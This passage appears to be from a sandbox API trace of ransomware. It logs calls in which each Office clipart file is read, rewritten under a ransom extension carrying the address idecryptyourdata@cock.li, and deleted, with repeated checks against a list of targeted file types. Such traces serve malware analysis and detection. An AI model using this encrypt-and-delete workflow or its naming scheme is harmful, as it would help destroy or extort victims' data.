Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0191.168] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=14132) returned 1 [0191.168] CloseHandle (hObject=0x39c) returned 1 [0191.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf")) returned 0x220 [0191.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0191.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0191.168] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0191.169] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0191.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0191.169] GetLastError () returned 0x0 [0191.169] ReadFile (in: hFile=0x39c, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x3734, lpOverlapped=0x0) returned 1 [0194.467] WriteFile (in: hFile=0x3a0, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x3740, lpOverlapped=0x0) returned 1 [0195.687] ReadFile (in: hFile=0x39c, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0195.687] WriteFile (in: hFile=0x3a0, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0195.687] SetEndOfFile (hFile=0x3a0) returned 1 [0195.687] CloseHandle (hObject=0x3a0) returned 1 [0195.687] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0195.688] SetEndOfFile (hFile=0x39c) returned 1 [0195.688] CloseHandle (hObject=0x39c) returned 1 [0195.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.891] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf")) returned 1 [0196.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.485] lstrlenW (lpString=".doc") returned 4 [0196.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.485] lstrlenW (lpString=".docx") returned 5 [0196.485] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.485] lstrlenW (lpString=".pdf") returned 4 [0196.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.485] lstrlenW (lpString=".xls") returned 4 [0196.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.485] lstrlenW (lpString=".xlsx") returned 5 [0196.485] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.485] lstrlenW (lpString=".ppt") returned 4 [0196.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString=".zip") returned 4 [0196.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.486] lstrlenW (lpString=".rar") returned 4 [0196.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString=".bz2") returned 4 [0196.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString=".7z") returned 3 [0196.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString=".dbf") returned 4 [0196.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString=".1cd") returned 4 [0196.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString=".jpg") returned 4 [0196.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.486] lstrlenW (lpString=".doc") returned 4 [0196.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString=".docx") returned 5 [0196.486] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.486] lstrlenW (lpString=".pdf") returned 4 [0196.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.486] lstrlenW (lpString=".xls") returned 4 [0196.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.486] lstrlenW (lpString=".xlsx") returned 5 [0196.487] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.487] lstrlenW (lpString=".ppt") returned 4 [0196.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.487] lstrlenW (lpString=".zip") returned 4 [0196.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.487] lstrlenW (lpString=".rar") returned 4 [0196.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.487] lstrlenW (lpString=".bz2") returned 4 [0196.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.487] lstrlenW (lpString=".7z") returned 3 [0196.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.487] lstrlenW (lpString=".dbf") returned 4 [0196.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.487] lstrlenW (lpString=".1cd") returned 4 [0196.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF") returned 68 [0196.487] lstrlenW (lpString=".jpg") returned 4 [0196.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.488] lstrlenW (lpString="J0152702.WMF") returned 12 [0196.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.489] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=1208) returned 1 [0196.489] CloseHandle (hObject=0x338) returned 1 [0196.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf")) returned 0x220 [0196.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.493] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.493] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0196.494] GetLastError () returned 0x0 [0196.494] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x4b8, lpOverlapped=0x0) returned 1 [0196.496] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x4c0, lpOverlapped=0x0) returned 1 [0196.497] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.497] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.497] SetEndOfFile (hFile=0x358) returned 1 [0196.498] CloseHandle (hObject=0x358) returned 1 [0196.498] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.498] SetEndOfFile (hFile=0x338) returned 1 [0196.499] CloseHandle (hObject=0x338) returned 1 [0196.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf")) returned 1 [0196.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.499] lstrlenW (lpString=".doc") returned 4 [0196.499] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.499] lstrlenW (lpString=".docx") returned 5 [0196.499] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.499] lstrlenW (lpString=".pdf") returned 4 [0196.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString=".xls") returned 4 [0196.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.500] lstrlenW (lpString=".xlsx") returned 5 [0196.500] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.500] lstrlenW (lpString=".ppt") returned 4 [0196.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.500] lstrlenW (lpString=".zip") returned 4 [0196.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.500] lstrlenW (lpString=".rar") returned 4 [0196.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString=".bz2") returned 4 [0196.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString=".7z") returned 3 [0196.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.500] lstrlenW (lpString=".dbf") returned 4 [0196.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.500] lstrlenW (lpString=".1cd") returned 4 [0196.500] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.501] lstrlenW (lpString=".jpg") returned 4 [0196.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.501] lstrlenW (lpString=".doc") returned 4 [0196.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString=".docx") returned 5 [0196.501] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.501] lstrlenW (lpString=".pdf") returned 4 [0196.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString=".xls") returned 4 [0196.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.501] lstrlenW (lpString=".xlsx") returned 5 [0196.501] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.501] lstrlenW (lpString=".ppt") returned 4 [0196.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.501] lstrlenW (lpString=".zip") returned 4 [0196.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.501] lstrlenW (lpString=".rar") returned 4 [0196.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString=".bz2") returned 4 [0196.501] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString=".7z") returned 3 [0196.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.501] lstrlenW (lpString=".dbf") returned 4 [0196.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.502] lstrlenW (lpString=".1cd") returned 4 [0196.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 68 [0196.502] lstrlenW (lpString=".jpg") returned 4 [0196.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.502] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.502] lstrlenW (lpString="J0152704.WMF") returned 12 [0196.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.503] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=1652) returned 1 [0196.503] CloseHandle (hObject=0x338) returned 1 [0196.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf")) returned 0x220 [0196.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.503] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.503] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0196.504] GetLastError () returned 0x0 [0196.504] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x674, lpOverlapped=0x0) returned 1 [0196.506] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x680, lpOverlapped=0x0) returned 1 [0196.507] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.507] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.507] SetEndOfFile (hFile=0x358) returned 1 [0196.507] CloseHandle (hObject=0x358) returned 1 [0196.507] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.507] SetEndOfFile (hFile=0x338) returned 1 [0196.508] CloseHandle (hObject=0x338) returned 1 [0196.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf")) returned 1 [0196.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.509] lstrlenW (lpString=".doc") returned 4 [0196.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.509] lstrlenW (lpString=".docx") returned 5 [0196.509] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.509] lstrlenW (lpString=".pdf") returned 4 [0196.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.509] lstrlenW (lpString=".xls") returned 4 [0196.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.509] lstrlenW (lpString=".xlsx") returned 5 [0196.509] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.509] lstrlenW (lpString=".ppt") returned 4 [0196.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.509] lstrlenW (lpString=".zip") returned 4 [0196.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.509] lstrlenW (lpString=".rar") returned 4 [0196.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.509] lstrlenW (lpString=".bz2") returned 4 [0196.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.509] lstrlenW (lpString=".7z") returned 3 [0196.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString=".dbf") returned 4 [0196.510] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString=".1cd") returned 4 [0196.510] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString=".jpg") returned 4 [0196.510] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString=".doc") returned 4 [0196.510] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString=".docx") returned 5 [0196.510] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0196.510] lstrlenW (lpString=".pdf") returned 4 [0196.510] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString=".xls") returned 4 [0196.510] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.510] lstrlenW (lpString=".xlsx") returned 5 [0196.510] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0196.510] lstrlenW (lpString=".ppt") returned 4 [0196.510] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.510] lstrlenW (lpString=".zip") returned 4 [0196.510] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.510] lstrlenW (lpString=".rar") returned 4 [0196.510] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.511] lstrlenW (lpString=".bz2") returned 4 [0196.511] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.511] lstrlenW (lpString=".7z") returned 3 [0196.511] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.511] lstrlenW (lpString=".dbf") returned 4 [0196.511] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.511] lstrlenW (lpString=".1cd") returned 4 [0196.511] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 68 [0196.511] lstrlenW (lpString=".jpg") returned 4 [0196.511] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.511] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.511] lstrlenW (lpString="J0152708.WMF") returned 12 [0196.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.512] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4908) returned 1 [0196.512] CloseHandle (hObject=0x338) returned 1 [0196.512] 